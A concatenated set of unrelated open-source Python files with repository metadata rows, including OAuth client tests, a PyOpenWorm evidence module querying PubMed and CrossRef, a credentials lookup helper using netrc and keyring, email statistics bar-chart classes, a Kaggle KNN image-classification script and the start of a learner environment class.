        self.mox.UnsetStubs()
    def _uri(self, type):
        """Return the full sandbox URL for a named OAuth endpoint."""
        uri = self.oauth_uris.get(type)
        if uri is None:
            raise KeyError("%s is not a valid OAuth URI type." % type)
        return "%s%s" % (self.host, uri)
    def create_simple_multipart_data(self, data):
        """Hand-build a multipart/form-data body; returns (content_type, body)."""
        boundary = '---Boundary-%d' % random.randint(1,1000)
        crlf = '\r\n'
        items = []
        for key, value in data.iteritems():
            items += [
                '--'+boundary,
                'Content-Disposition: form-data; name="%s"'%str(key),
                '',
                str(value),
            ]
        items += ['', '--'+boundary+'--', '']
        content_type = 'multipart/form-data; boundary=%s' % boundary
        return content_type, crlf.join(items)
    def test_access_token_get(self):
        """Test getting an access token via GET."""
        client = oauth.Client(self.consumer, None)
        resp, content = client.request(self._uri('request_token'), "GET")
        self.assertEquals(int(resp['status']), 200)
    def test_access_token_post(self):
        """Test getting an access token via POST."""
        client = oauth.Client(self.consumer, None)
        resp, content = client.request(self._uri('request_token'), "POST")
        self.assertEquals(int(resp['status']), 200)
        res = dict(parse_qsl(content))
        self.assertTrue('oauth_token' in res)
        self.assertTrue('oauth_token_secret' in res)
    def _two_legged(self, method):
        """Issue a two-legged request with the sample body; returns (resp, content)."""
        client = oauth.Client(self.consumer, None)
        return client.request(self._uri('two_legged'), method,
            body=urllib.urlencode(self.body))
    def test_two_legged_post(self):
        """A test of a two-legged OAuth POST request."""
        resp, content = self._two_legged("POST")
        self.assertEquals(int(resp['status']), 200)
    def test_two_legged_get(self):
        """A test of a two-legged OAuth GET request."""
        resp, content = self._two_legged("GET")
        self.assertEquals(int(resp['status']), 200)
    def test_multipart_post_does_not_alter_body(self):
        """oauth.Client must pass a multipart body through to httplib2
        unchanged (verified via a mox stub on httplib2.Http.request)."""
        self.mox.StubOutWithMock(httplib2.Http, 'request')
        random_result = random.randint(1,100)
        data = {
            'rand-%d'%random.randint(1,100):random.randint(1,100),
        }
        content_type, body = self.create_simple_multipart_data(data)
        client = oauth.Client(self.consumer, None)
        uri = self._uri('two_legged')
        # Record the exact call we expect the client to make.
        expected_kwargs = {
            'method':'POST',
            'body':body,
            'redirections':httplib2.DEFAULT_MAX_REDIRECTS,
            'connection_type':None,
            'headers':mox.IsA(dict),
        }
        httplib2.Http.request(client, uri, **expected_kwargs).AndReturn(random_result)
        self.mox.ReplayAll()
        result = client.request(uri, 'POST', headers={'Content-Type':content_type}, body=body)
        self.assertEqual(result, random_result)
        self.mox.VerifyAll()
# Run the whole test suite when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
| mit | -2,785,435,832,432,267,000 | 35.196429 | 121 | 0.606117 | false | 3.691271 | true | false | false |
kaustubhcs/PyOpenWorm | PyOpenWorm/evidence.py | 2 | 12890 | from PyOpenWorm import *
class EvidenceError(Exception):
    """Base error type for failures specific to Evidence handling."""
    pass
def _pubmed_uri_to_pmid(uri):
from urlparse import urlparse
parsed = urlparse(uri)
pmid = int(parsed.path.split("/")[2])
return pmid
def _doi_uri_to_doi(uri):
from urlparse import urlparse
from urllib2 import unquote
parsed = urlparse(uri)
doi = parsed.path.split("/")[1]
# the doi from a url needs to be decoded
doi = unquote(doi)
return doi
def _url_request(url, headers=None):
    """Open *url* with optional request *headers*.

    Returns the response file-like object on success, or the empty
    string ``""`` on any HTTP/URL error (callers must be prepared for
    either return type — this mirrors the original best-effort contract).

    Fixes the original mutable-default-argument (``headers={}``) and adds
    a Python 3 import path while keeping the Python 2 behavior intact.

    Parameters
    ----------
    url : str
        The URL to fetch (1-second timeout).
    headers : dict, optional
        Extra HTTP request headers.
    """
    try:  # Python 3
        import urllib.request as U
        from urllib.error import HTTPError, URLError
    except ImportError:  # Python 2
        import urllib2 as U
        from urllib2 import HTTPError, URLError
    if headers is None:
        headers = {}
    try:
        r = U.Request(url, headers=headers)
        s = U.urlopen(r, timeout=1)
        return s
    except HTTPError:
        return ""
    except URLError:
        return ""
def _json_request(url):
    """Fetch *url* and parse the response body as JSON.

    Returns the parsed object, or an empty dict on *any* failure
    (network error, non-JSON body, or the ``""`` that _url_request
    returns on error). The broad ``except BaseException`` is a
    deliberate best-effort choice: callers treat ``{}`` as "no data".
    """
    import json
    headers = {'Content-Type': 'application/json'}
    try:
        return json.load(_url_request(url,headers))
    except BaseException:
        return {}
class AssertsAllAbout(Property):
    """A Property that asserts an object *and* each of its properties.

    Setting it is equivalent to calling ``owner.asserts`` on the object
    and on every one of the object's properties (non-recursively).
    """
    # TODO: Needs tests!
    multiple=True
    def __init__(self, **kwargs):
        Property.__init__(self, 'asserts_all_about', **kwargs)
    def set(self, o, **kwargs):
        """Establish the "asserts" relationship for all of the properties of the given object"""
        self.owner.asserts(o)
        for p in o.properties:
            self.owner.asserts(p)
    def get(self, **kwargs):
        # traverse the hierarchy of ObjectProperties and return all of the asserts relationships...
        # NOTE(review): this method is unfinished — it builds namespace
        # bindings and a SPARQL query string but never executes the query,
        # so it implicitly returns None.
        ns = { "ow": self.base_namespace,
               "ns1" : self.rdf_namespace,
               "ev": self.base_namespace["Evidence"] + "/",
               "ns2" : self.base_namespace["SimpleProperty"] + "/"
             }
        q = """
        SELECT ?DataObject ?x ?prop WHERE
        {
            ?DataObject rdf:type ow:DataObject .
            ?DataObject ?x ?DataObject_prop .
            ?DataObject_prop sp:value ?prop .
            ?Evidence ev:asserts ?Evidence_asserts .
            filter (EXISTS { ?DataObject_prop rdf:type ow:Property . })
        # object
        # asserts property pattern
        # general property pattern
        }
        """
    def triples(self, **kwargs):
        #XXX: All triples here are from ``asserts``
        return []
class Evidence(DataObject):
    """
    A representation of some document which provides evidence like scholarly
    references, for other objects.
    Possible keys include::
        pmid,pubmed: a pubmed id or url (e.g., 24098140)
        wbid,wormbase: a wormbase id or url (e.g., WBPaper00044287)
        doi: a Digitial Object id or url (e.g., s00454-010-9273-0)
    Attaching evidence
    -------------------
    Attaching evidence to an object is as easy as::
        e = Evidence(author='White et al.', date='1986')
        e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
        e.save()
    But what does this series of statements mean? For us it means that White et al.
    assert that "the cells VA11 and VD12 have a connection".
    In particular, it says nothing about the neurons themselves.
    Another example::
        e = Evidence(author='Sulston et al.', date='1983')
        e.asserts(Neuron(name="AVDL").lineageName("AB alaaapalr"))
        e.save()
    This would say that Sulston et al. claimed that neuron AVDL has lineage AB alaaapalr.
    Now a more ambiguous example::
        e = Evidence(author='Sulston et al.', date='1983')
        e.asserts(Neuron(name="AVDL"))
        e.save()
    What might this mean? There's no clear relationship being discussed as in the
    previous examples. There are two reasonable semantics for
    these statements. They could indicate that Sulston et al. assert everything
    about the AVDL (in this case, only its name). Or they could
    indicate that Sulston et al. state the existence of AVDL. We will assume the
    semantics of the latter for *most* objects. The second
    intention can be expressed as::
        e = Evidence(author='Sulston et al.', date='1983')
        e.asserts_all_about(Neuron(name="AVDL"))
        e.save()
    `asserts_all_about` individually asserts each of the properties of the Neuron
    including its existence. It does not recursively assert
    properties of values set on the AVDL Neuron. If, for instance, the Neuron had a
    *complex object* as the value for its receptor types with
    information about the receptor's name primary agonist, etc., `asserts_all_about`
    would say nothing about these. However, `asserts_all` (TODO)::
        e.asserts_all(Neuron(name="AVDL",receptor=complex_receptor_object))
    would make the aforementioned recursive statement.
    Retrieving evidence
    -------------------
    .. Not tested with the latest
    Retrieving evidence for an object is trivial as well ::
        e = Evidence()
        e.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
        for x in e.load():
            print x
    This would print all of the evidence for the connection between VA11 and VD12
    It's important to note that the considerations of recursive evidence assertions
    above do not operate for retrieval. Only evidence for the
    particular object queried (the Connection in the example above), would be
    returned and not any evidence for anything otherwise about VA11
    or VD12.
    Attributes
    ----------
    asserts : ObjectProperty (value_type=DataObject)
        When used with an argument, state that this Evidence asserts that the
        relationship is true.
        Example::
            import bibtex
            bt = bibtex.parse("my.bib")
            n1 = Neuron("AVAL")
            n2 = Neuron("DA3")
            c = Connection(pre=n1,post=n2,class="synapse")
            e = Evidence(bibtex=bt['white86'])
            e.asserts(c)
        Other methods return objects which asserts accepts.
        Example::
            n1 = Neuron("AVAL")
            r = n1.neighbor("DA3")
            e = Evidence(bibtex=bt['white86'])
            e.asserts(r)
        When used without arguments, returns a sequence of statements asserted by
        this evidence
        Example::
            import bibtex
            bt = bibtex.parse("my.bib")
            n1 = Neuron("AVAL")
            n2 = Neuron("DA3")
            c = Connection(pre=n1,post=n2,class="synapse")
            e = Evidence(bibtex=bt['white86'])
            e.asserts(c)
            list(e.asserts()) # Returns a list [..., d, ...] such that d==c
    doi : DatatypeProperty
        A Digital Object Identifier (DOI) that provides evidence, optional
    pmid : DatatypeProperty
        A PubMed ID (PMID) that point to a paper that provides evidence, optional
    wormbaseid : DatatypeProperty
        An ID from WormBase that points to a record that provides evidence, optional
    author : DatatypeProperty
        The author of the evidence
    title : DatatypeProperty
        The title of the evidence
    year : DatatypeProperty
        The date (e.g., publication date) of the evidence
    uri : DatatypeProperty
        A URL that points to evidence
    Parameters
    ----------
    doi : string
        A Digital Object Identifier (DOI) that provides evidence, optional
    pmid : string
        A PubMed ID (PMID) that point to a paper that provides evidence, optional
    wormbaseid : string
        An ID from WormBase that points to a record that provides evidence, optional
    author : string
        The author of the evidence
    title : string
        The title of the evidence
    year : string or int
        The date (e.g., publication date) of the evidence
    uri : string
        A URL that points to evidence
    """
    def __init__(self, conf=False, **source):
        # The type of the evidence (a paper, a lab, a uri) is
        # determined by the `source` key
        # We keep track of a set of fields for the evidence.
        # Some of the fields are pulled from provided URIs and
        # some is provided by the user.
        #
        # Turns into a star graph
        #
        # Evidence field1 value1
        #        ; field2 value2
        #        ; field3 value3 .
        DataObject.__init__(self, conf=conf)
        self._fields = dict()
        Evidence.ObjectProperty('asserts', multiple=True, owner=self)
        AssertsAllAbout(owner=self)
        # 'author' and 'uri' may have several values; the rest are single.
        multivalued_fields = ('author', 'uri')
        for x in multivalued_fields:
            Evidence.DatatypeProperty(x, multiple=True, owner=self)
        other_fields = ('year',
                'title',
                'doi',
                'wbid',
                'pmid')
        fields = multivalued_fields + other_fields
        for x in other_fields:
            Evidence.DatatypeProperty(x, owner=self)
        #XXX: I really don't like putting these in two places
        # Each recognized source key triggers a network lookup that may
        # fill in author/title/year from the corresponding service.
        for k in source:
            if k in ('pubmed', 'pmid'):
                self._fields['pmid'] = source[k]
                self._pubmed_extract()
                self.pmid(source[k])
            if k in ('wormbaseid','wormbase', 'wbid'):
                self._fields['wormbase'] = source[k]
                self._wormbase_extract()
                self.wbid(source[k])
            if k in ('doi',):
                self._fields['doi'] = source[k]
                self._crossref_doi_extract()
                self.doi(source[k])
            if k in ('bibtex',):
                self._fields['bibtex'] = source[k]
            if k in fields:
                getattr(self,k)(source[k])
    def add_data(self, k, v):
        """ Add a field

        Creates a new DatatypeProperty named *k* on this Evidence and
        sets it to *v*.

        Parameters
        ----------
        k : string
            Field name
        v : string
            Field value
        """
        self._fields[k] = v
        dp = Evidence.DatatypeProperty(k,owner=self)
        dp(v)
    # Each 'extract' method should attempt to fill in additional fields given which ones
    # are already set as well as correct fields that are wrong
    # TODO: Provide a way to override modification of already set values.
    def _wormbase_extract(self):
        """Fill author/year from the WormBase REST API for self._fields['wormbase']."""
        #XXX: wormbase's REST API is pretty sparse in terms of data provided.
        # Would be better off using AQL or the perl interface
        # _Very_ few of these have these fields filled in
        wbid = self._fields['wormbase']
        def wbRequest(ident,field):
            return _json_request("http://api.wormbase.org/rest/widget/paper/"+wbid+"/"+field)
        # get the author
        j = wbRequest(wbid, 'authors')
        if 'fields' in j:
            f = j['fields']
            if 'data' in f:
                self.author([x['label'] for x in f['data']])
            elif 'name' in f:
                self.author(f['name']['data']['label'])
        # get the publication date
        j = wbRequest(wbid, 'publication_date')
        if 'fields' in j:
            f = j['fields']
            if 'data' in f:
                self.year(f['data']['label'])
            elif 'name' in f:
                self.year(f['name']['data']['label'])
    def _crossref_doi_extract(self):
        """Fill author/title/year from the CrossRef search API for self._fields['doi']."""
        # Extract data from crossref
        def crRequest(doi):
            import urllib as U
            data = {'q': doi}
            data_encoded = U.urlencode(data)
            return _json_request('http://search.labs.crossref.org/dois?%s' % data_encoded)
        doi = self._fields['doi']
        if doi[:4] == 'http':
            doi = _doi_uri_to_doi(doi)
        r = crRequest(doi)
        #XXX: I don't think coins is meant to be used, but it has structured data...
        if len(r)>0:
            # Parse the OpenURL 'coins' blob into key/value pairs to get authors.
            extra_data = r[0]['coins'].split('&')
            fields = (x.split("=") for x in extra_data)
            fields = [[y.replace('+', ' ').strip() for y in x] for x in fields]
            authors = [x[1] for x in fields if x[0] == 'rft.au']
            for a in authors:
                self.author(a)
        # no error for bad ids, just an empty list
        if len(r) > 0:
            # Crossref can process multiple doi's at one go and return the metadata. we just need the first one
            r = r[0]
            if 'title' in r:
                self.title(r['title'])
            if 'year' in r:
                self.year(r['year'])
    def _pubmed_extract(self):
        """Fill authors from the NCBI eUtils esummary API for self._fields['pmid']."""
        def pmRequest(pmid):
            import xml.etree.ElementTree as ET # Python 2.5 and up
            base = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
            # XXX: There's more data in esummary.fcgi?, but I don't know how to parse it
            url = base + "esummary.fcgi?db=pubmed&id=%d" % pmid
            return ET.parse(_url_request(url))
        pmid = self._fields['pmid']
        if pmid[:4] == 'http':
            # Probably a uri, right?
            pmid = _pubmed_uri_to_pmid(pmid)
        pmid = int(pmid)
        tree = pmRequest(pmid)
        for x in tree.findall('./DocSum/Item[@Name="AuthorList"]/Item'):
            self.author(x.text)
| mit | 8,356,134,866,388,307,000 | 34.122616 | 115 | 0.578898 | false | 3.84891 | false | false | false |
jhermann/rudiments | src/rudiments/security.py | 1 | 5487 | # -*- coding: utf-8 -*-
# pylint: disable=bad-continuation
""" Security / AuthN / AuthZ helpers.
"""
# Copyright © 2015 - 2019 Jürgen Hermann <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals, print_function
import re
import errno
import base64
import getpass
from netrc import netrc, NetrcParseError
try:
import keyring_DISABLED_FOR_NOW # TODO
except ImportError:
keyring = None
from ._compat import urlparse
__all__ = ['Credentials']
class Credentials():
"""Look up and provide authN credentials (username / password) from common sources."""
URL_RE = re.compile(r'^(http|https|ftp|ftps)://') # covers the common use cases
NETRC_FILE = None # use the default, unless changed for test purposes
AUTH_MEMOIZE_INPUT = {} # remember manual auth input across several queries in one run
    def __init__(self, target):
        """``target`` is a representation of the secured object, typically an URL.

        All credential fields start unset; they are resolved lazily by
        :meth:`auth_pair` / :meth:`_get_auth`. ``source`` records which
        backend ('url', 'netrc', 'keyring', 'console') supplied them.
        """
        self.target = target
        self.user = None
        self.password = None
        self.keyring_service = target
        self.source = None
def auth_valid(self):
"""Return bool indicating whether full credentials were provided."""
return bool(self.user and self.password)
    def auth_pair(self, force_console=False):
        """Return username/password tuple, possibly prompting the user for them.

        If credentials are not yet complete, :meth:`_get_auth` is invoked
        first; with ``force_console=True`` it skips URL/netrc/keyring lookup
        and prompts interactively.
        """
        if not self.auth_valid():
            self._get_auth(force_console)
        return (self.user, self.password)
    def _raw_input(self, prompt=None):
        """Mockable wrapper for raw_input (tests can override this to avoid a real prompt)."""
        return input(prompt)
    def _get_auth(self, force_console=False):
        """Try to get login auth from known sources.

        Resolution order for URL-like targets: credentials embedded in the
        URL itself, then keyring, then ``~/.netrc``, then an interactive
        console prompt. Non-URL targets (and ``force_console=True``) go
        straight to the console. On success, ``self.source`` records which
        backend won.
        """
        if not self.target:
            raise ValueError("Unspecified target ({!r})".format(self.target))
        elif not force_console and self.URL_RE.match(self.target):
            auth_url = urlparse(self.target)
            source = 'url'
            if auth_url.username:
                self.user = auth_url.username
            if auth_url.password:
                self.password = auth_url.password
            # Fall through the backends until user AND password are known.
            if not self.auth_valid():
                source = self._get_auth_from_keyring()
            if not self.auth_valid():
                source = self._get_auth_from_netrc(auth_url.hostname)
            if not self.auth_valid():
                source = self._get_auth_from_console(self.target)
        else:
            source = self._get_auth_from_console(self.target)
        if self.auth_valid():
            self.source = source
    def _get_auth_from_console(self, realm):
        """Prompt for the user and password.

        Answers are memoized per *realm* in the class-level
        ``AUTH_MEMOIZE_INPUT`` dict so one run never prompts twice for
        the same realm. The OS login name is offered as the default user.
        """
        self.user, self.password = self.AUTH_MEMOIZE_INPUT.get(realm, (self.user, None))
        if not self.auth_valid():
            if not self.user:
                login = getpass.getuser()
                self.user = self._raw_input('Username for "{}" [{}]: '.format(realm, login)) or login
            self.password = getpass.getpass('Password for "{}": '.format(realm))
            Credentials.AUTH_MEMOIZE_INPUT[realm] = self.user, self.password
        return 'console'
    def _get_auth_from_netrc(self, hostname):
        """Try to find login auth in ``~/.netrc``.

        Looks up ``user@hostname`` first, then plain ``hostname``.
        Returns ``'netrc'`` when an entry was found, ``None`` when the
        netrc file does not exist. A password of the literal string
        ``base64`` marks an obfuscated entry whose real password is
        base64-encoded in the *account* field.
        """
        try:
            hostauth = netrc(self.NETRC_FILE)
        except IOError as cause:
            if cause.errno != errno.ENOENT:
                raise
            # Missing ~/.netrc is not an error — just no credentials here.
            return None
        except NetrcParseError as cause:
            raise # TODO: Map to common base class, so caller has to handle less error types?
        # Try to find specific `user@host` credentials first, then just `host`
        auth = hostauth.hosts.get('{}@{}'.format(self.user or getpass.getuser(), hostname), None)
        if not auth:
            auth = hostauth.hosts.get(hostname, None)
        if auth:
            username, account, password = auth # pylint: disable=unpacking-non-sequence
            if username:
                self.user = username
            if password == 'base64':
                # support for password obfuscation, prevent "over the shoulder lookup"
                self.password = base64.b64decode(account).decode('ascii')
            elif password:
                self.password = password
        return 'netrc'
    def _get_password_from_keyring(self, accountname):
        """Query keyring for a password entry (service name is the target)."""
        return keyring.get_password(self.keyring_service, accountname)
    def _get_auth_from_keyring(self):
        """Try to get credentials using `keyring <https://github.com/jaraco/keyring>`_.

        Returns ``'keyring'`` on success, ``None`` when the keyring
        backend is unavailable (its import is currently disabled at
        module level) or holds no matching entry.
        """
        if not keyring:
            return None
        # Take user from URL if available, else the OS login name
        password = self._get_password_from_keyring(self.user or getpass.getuser())
        if password is not None:
            self.user = self.user or getpass.getuser()
            self.password = password
            return 'keyring'
| apache-2.0 | -7,458,670,958,381,981,000 | 37.356643 | 101 | 0.620966 | false | 4.139623 | false | false | false |
txsl/mail-trends | stats/bucket.py | 3 | 5756 | from pygooglechart import StackedVerticalBarChart, Axis
from base import *
_Y_AXIS_SPACE = 36
class BucketStat(ChartStat):
  """Base class for histogram-style stats: counts messages into a fixed
  number of buckets and renders them as a Google Chart bar graph.

  Subclasses implement ``_GetBucket(obj) -> int or None`` (the bucket
  index for one message) and ``_GetBucketLabels() -> list`` (x-axis
  labels, one per bucket).
  """
  def __init__(self, bucket_count, title, width, height):
    ChartStat.__init__(self)
    # One counter per bucket, plus the running maximum for axis scaling.
    self.__buckets = [0] * bucket_count
    self.__max = 0
    self.__title = title
    self.__width = width
    self.__height = height
  def _GetBucketCollection(self, message_infos, threads):
    # Default: bucket individual messages; subclasses may bucket threads.
    return message_infos
  def ProcessMessageInfos(self, message_infos, threads):
    """Tally every message (or thread) into its bucket; None is skipped."""
    for bucket_obj in self._GetBucketCollection(message_infos, threads):
      bucket = self._GetBucket(bucket_obj)
      if bucket is None: continue
      self.__buckets[bucket] += 1
      v = self.__buckets[bucket]
      if v > self.__max:
        self.__max = v
  def GetHtml(self):
    """Render the buckets as an HTML fragment embedding a chart URL."""
    max = self._GetRescaledMax(self.__max)
    w = self.__width
    h = self.__height
    # We don't really care about StackedVerticalBarChart vs.
    # GroupedVerticalBarChart since we just have one data-set, but only the
    # stacked graph seems to respect the bar spacing option
    chart = StackedVerticalBarChart(w, h)
    # Compute bar width so that it fits in the overall graph width.
    bucket_width = (w - _Y_AXIS_SPACE)/len(self.__buckets)
    bar_width = bucket_width * 4/5
    space_width = bucket_width - bar_width
    chart.set_bar_width(bar_width)
    chart.set_bar_spacing(space_width)
    chart.add_data(self._GetRescaledData(self.__buckets, max))
    chart.set_axis_range(Axis.LEFT, 0, max)
    chart.set_axis_labels(Axis.BOTTOM, self._GetBucketLabels())
    # We render the title in the template instead of in the chart, to give
    # stat collections and individual stats similar appearance
    t = Template(
        file="templates/bucket-stat.tmpl",
        searchList = {
          "id": self.id,
          "title": self.__title,
          "width": w,
          "height": h,
          "chart_url": chart.get_url()
        })
    return unicode(t)
class TimeOfDayStat(BucketStat):
  """Histogram of message counts per hour of the day (24 buckets)."""

  def __init__(self):
    BucketStat.__init__(self, 24, 'Time of day', 400, 200)

  def _GetBucket(self, message_info):
    # tm_hour is already in the 0-23 range used for bucket indices.
    return message_info.GetDate().tm_hour

  def _GetBucketLabels(self):
    # Label every sixth hour; the remaining slots stay blank.
    return (['Midnight'] + [''] * 5 +
            ['6 AM'] + [''] * 5 +
            ['Noon'] + [''] * 5 +
            [' 6 PM'] + [''] * 5)
class DayOfWeekStat(BucketStat):
  """Histogram of message counts per day of the week, Sunday first."""

  def __init__(self):
    BucketStat.__init__(self, 7, 'Day of week', 300, 200)

  def _GetBucket(self, message_info):
    # struct_time has Monday == 0; shift so that Sunday maps to bucket 0.
    weekday = message_info.GetDate().tm_wday
    return (weekday + 1) % 7

  def _GetBucketLabels(self):
    return list('SMTWTFS')
class YearStat(BucketStat):
  """Histogram of message counts per year over the given date range."""

  def __init__(self, date_range):
    self.__years = GetYearRange(date_range)
    # Widen the chart with the number of years so every bar stays readable.
    width = _Y_AXIS_SPACE + 30 * len(self.__years)
    BucketStat.__init__(
        self, len(self.__years), "Year", width, 200)

  def _GetBucket(self, message_info):
    first_year = self.__years[0]
    return message_info.GetDate().tm_year - first_year

  def _GetBucketLabels(self):
    return [str(year) for year in self.__years]
class MonthStat(BucketStat):
  """Histogram of per-month message counts for one specific year."""

  def __init__(self, year):
    self.__year = year
    # No title is necessary, since the stat collection provides one
    BucketStat.__init__(self, 12, None, 300, 200)

  def _GetBucket(self, message_info):
    date = message_info.GetDate()
    if date.tm_year != self.__year:
      # Messages from other years don't belong in this histogram.
      return None
    return date.tm_mon - 1

  def _GetBucketLabels(self):
    return MONTH_NAMES
class DayStat(BucketStat):
  """Histogram of per-day message counts for one specific month of a year."""

  def __init__(self, year, month):
    self.__year = year
    self.__month = month
    self.__days_in_month = calendar.monthrange(year, month)[1]
    # No title is necessary, since the stat collection provides one
    BucketStat.__init__(
        self,
        self.__days_in_month,
        None,
        500,
        200)

  def _GetBucket(self, message_info):
    date = message_info.GetDate()
    if date.tm_year != self.__year or date.tm_mon != self.__month:
      # Only messages from exactly this year/month are counted.
      return None
    return date.tm_mday - 1

  def _GetBucketLabels(self):
    return [str(day) for day in range(1, self.__days_in_month + 1)]
class SizeBucketStat(BucketStat):
  """Histogram of message sizes, bucketed by powers of two (plus a 0 bucket)."""

  # 0, then 512 bytes (2**9) up to 8 MB (2**23) in power-of-two steps.
  _SIZE_BUCKETS = [0] + [1 << power for power in range(9, 24)]

  def __init__(self):
    BucketStat.__init__(
        self,
        len(SizeBucketStat._SIZE_BUCKETS),
        "Message sizes",
        500,
        200)

  def _GetBucket(self, message_info):
    size = message_info.size
    # Walk the thresholds from largest to smallest; the first one that the
    # size reaches determines the bucket.
    for index in xrange(len(SizeBucketStat._SIZE_BUCKETS) - 1, -1, -1):
      if size >= SizeBucketStat._SIZE_BUCKETS[index]:
        return index

  def _GetBucketLabels(self):
    return [GetDisplaySize(size) for size in SizeBucketStat._SIZE_BUCKETS]
class ThreadSizeBucketStat(BucketStat):
  """Histogram of thread lengths (number of messages per thread)."""

  # Fine-grained buckets up to 10 messages, then progressively coarser steps.
  _SIZE_BUCKETS = list(range(1, 11)) + [20, 30, 40, 50, 100, 150, 200]

  def __init__(self):
    BucketStat.__init__(
        self,
        len(ThreadSizeBucketStat._SIZE_BUCKETS),
        "Thread lengths",
        500,
        200)

  def _GetBucketCollection(self, message_infos, threads):
    # This stat buckets whole threads rather than individual messages.
    return threads

  def _GetBucket(self, thread):
    size = len(thread)
    for index in xrange(len(ThreadSizeBucketStat._SIZE_BUCKETS) - 1, -1, -1):
      if size >= ThreadSizeBucketStat._SIZE_BUCKETS[index]:
        return index

  def _GetBucketLabels(self):
    return [str(size) for size in ThreadSizeBucketStat._SIZE_BUCKETS]
zhmz90/first_step_with_julia_kaggle.jl | King/sklearn.py | 1 | 1747 | # Loading Data
import pandas as pd
from skimage.io import imread
import numpy as np
def read_data(typeData, labelsInfo, imageSize, path):
    """Read the resized BMP images listed in *labelsInfo* into a matrix.

    Returns an array of shape (n_images, imageSize) with one flattened
    greyscale image per row, in the order of labelsInfo["ID"].
    """
    features = np.zeros((labelsInfo.shape[0], imageSize))

    for row, image_id in enumerate(labelsInfo["ID"]):
        # Images live under e.g. <path>/trainResized/<id>.Bmp
        file_name = "{0}/{1}Resized/{2}.Bmp".format(path, typeData, image_id)
        image = imread(file_name, as_grey=True)
        features[row, :] = np.reshape(image, (1, imageSize))
    return features
imageSize = 400 # 20 x 20 pixels

#Set location of data files , folders
path = "/home/guo/haplox/Github/first_step_with_julia_kaggle/data/data"

labelsInfoTrain = pd.read_csv("{0}/trainLabels.csv".format(path))

#Read training matrix
xTrain = read_data("train", labelsInfoTrain, imageSize, path)

#Read information about test data ( IDs ).
labelsInfoTest = pd.read_csv("{0}/sampleSubmission.csv".format(path))

#Read test matrix
xTest = read_data("test", labelsInfoTest, imageSize, path)

# Labels are single characters; encode them as their ordinal values so the
# classifier gets numeric targets. NOTE: this is Python 2 code -- map()
# returns a list here and the print statements below are Py2 syntax.
yTrain = map(ord, labelsInfoTrain["Class"])
yTrain = np.array(yTrain)

# Importing main functions
from sklearn.cross_validation import cross_val_score as k_fold_CV
from sklearn.neighbors import KNeighborsClassifier as KNN
from sklearn.grid_search import GridSearchCV

# Running LOOF-CV with 1NN sequentially
# (note: cv=2 below actually runs 2-fold cross-validation, not leave-one-out)
import time
start = time.time()
model = KNN(n_neighbors=1)
cvAccuracy = np.mean(k_fold_CV(model, xTrain, yTrain, cv=2, scoring="accuracy"))
print "The 2-CV accuracy of 1NN", cvAccuracy
print time.time() - start, "seconds elapsed"

# Tuning the value for k
# Grid-search n_neighbors in 1..4 with 5-fold CV on the training set.
start = time.time()
tuned_parameters = [{"n_neighbors":list(range(1,5))}]
clf = GridSearchCV( model, tuned_parameters, cv=5, scoring="accuracy")
clf.fit(xTrain, yTrain)
print clf.grid_scores_
print time.time() - start, "seconds elapsed"
| mit | 3,464,750,835,726,655,000 | 27.639344 | 80 | 0.734402 | false | 3.038261 | true | false | false |
general-ai-challenge/Round1 | src/core/environment.py | 1 | 14751 | # Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from core.events import EventManager
from core.task import StateChanged, MessageReceived, \
SequenceReceived, OutputSequenceUpdated, OutputMessageUpdated
from core.obs.observer import Observable
from core.serializer import ScramblingSerializerWrapper
from core.channels import InputChannel, OutputChannel
from core.byte_channels import ByteInputChannel, ByteOutputChannel
from collections import defaultdict
import logging
class Environment:
    '''
    The Environment is the one that communicates with the Learner,
    interpreting its output and reacting to it. The interaction is governed
    by an ongoing task which is picked by a TaskScheduler object.

    :param serializer: a Serializer object that translates text into binary and
        back.
    :param task_scheduler: a TaskScheduler object that determines which task
        is going to be run next.
    :param scramble: if True, the words outputted by the tasks are randomly
        scrambled.
    :param max_reward_per_task: maximum amount of reward that a learner can
        receive for a given task.
    '''

    def __init__(self, serializer, task_scheduler, scramble=False,
                 max_reward_per_task=10000, byte_mode=False):
        # save parameters into member variables
        self._task_scheduler = task_scheduler
        self._serializer = serializer
        self._max_reward_per_task = max_reward_per_task
        # cumulative reward per task
        self._reward_per_task = defaultdict(int)
        # the event manager is the controller that dispatches
        # changes in the environment (like new inputs or state changes)
        # to handler functions in the tasks that tell the environment
        # how to react
        self.event_manager = EventManager()
        # initialize member variables
        self._current_task = None
        self._current_world = None
        if scramble:
            serializer = ScramblingSerializerWrapper(serializer)
        if byte_mode:
            # we hear to our own output
            self._output_channel_listener = ByteInputChannel(serializer)
            # output channel
            self._output_channel = ByteOutputChannel(serializer)
            # input channel
            self._input_channel = ByteInputChannel(serializer)
        else:
            # we hear to our own output
            self._output_channel_listener = InputChannel(serializer)
            # output channel
            self._output_channel = OutputChannel(serializer)
            # input channel
            self._input_channel = InputChannel(serializer)
        # priority of ongoing message
        self._output_priority = 0
        # reward that is to be given at the learner at the end of the task
        self._reward = None
        self._result = None
        self._last_result = None
        # reward that is to be given immediately
        self._immediate_reward = None
        # Current task time
        self._task_time = None
        # Task separator issued
        self._task_separator_issued = False
        # Internal logger
        self.logger = logging.getLogger(__name__)

        # signals
        self.world_updated = Observable()
        self.task_updated = Observable()

        # Register channel observers
        self._input_channel.sequence_updated.register(
            self._on_input_sequence_updated)
        self._input_channel.message_updated.register(
            self._on_input_message_updated)
        self._output_channel_listener.sequence_updated.register(
            self._on_output_sequence_updated)
        self._output_channel_listener.message_updated.register(
            self._on_output_message_updated)

    def next(self, learner_input):
        '''Main loop of the Environment. Receives one bit from the learner and
        produces a response (also one bit).'''
        self._last_result = None  # will be set while execution is inside this function or its child tree

